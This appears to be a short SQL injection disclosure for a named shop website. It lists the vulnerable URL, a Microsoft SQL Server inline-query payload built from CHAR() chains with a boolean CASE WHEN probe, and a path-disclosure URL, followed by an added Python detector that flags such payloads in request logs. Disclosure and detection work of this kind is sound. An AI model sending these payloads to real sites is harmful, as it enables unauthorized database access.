Affected URL:
http://shop.cnstock.com/gouwulist.aspx?Id=16
Injection type:
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Id=(SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (3604=3604) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(117)+CHAR(113)+CHAR(113))
Database and table enumeration:
Absolute path disclosure:
http://shop.cnstock.com/ProductDetial.aspx?id=4%E2%80%9D&os=4
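
A defender-side check for the inline-query payload shown above, as an added example that is not part of the original report: it decodes the CHAR() concatenation chains into the marker strings they build and flags the constant CASE WHEN comparison in request logs. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote

# Payload value exactly as shown in the report above.
PAYLOAD = ("(SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(103)+CHAR(113)+"
           "(SELECT (CASE WHEN (3604=3604) THEN CHAR(49) ELSE CHAR(48) END))+"
           "CHAR(113)+CHAR(102)+CHAR(117)+CHAR(113)+CHAR(113))")

CHAR_TERM = re.compile(r"CHAR\(\s*(\d{1,3})\s*\)", re.I)
# Three or more CHAR(n) terms joined by '+': string building that avoids quotes.
CHAR_CHAIN = re.compile(
    r"CHAR\(\s*\d{1,3}\s*\)(?:\s*\+\s*CHAR\(\s*\d{1,3}\s*\)){2,}", re.I)
# CASE WHEN (n=m): boolean probe whose result is echoed between the markers.
BOOL_PROBE = re.compile(r"CASE\s+WHEN\s*\(\s*(\d+)\s*=\s*(\d+)\s*\)", re.I)


def decode_chains(text):
    """Return the literal string built by each CHAR(n)+CHAR(n)+... chain."""
    return ["".join(chr(int(n)) for n in CHAR_TERM.findall(m.group(0)))
            for m in CHAR_CHAIN.finditer(text)]


def analyze(request_line):
    """Return a finding dict for a suspicious request line, else None."""
    decoded = unquote(request_line)  # log lines usually carry %2B, %28, ...
    markers = decode_chains(decoded)
    probe = BOOL_PROBE.search(decoded)
    if not markers and not probe:
        return None
    return {
        "markers": markers,
        "constant_condition": bool(probe and probe.group(1) == probe.group(2)),
    }


# Constructed sample request lines (not taken from real logs).
SAMPLE_LOG = [
    "GET /gouwulist.aspx?Id=16 HTTP/1.1",
    "GET /gouwulist.aspx?Id=" + quote(PAYLOAD, safe="") + " HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(analyze(line), "<-", line[:50])
```
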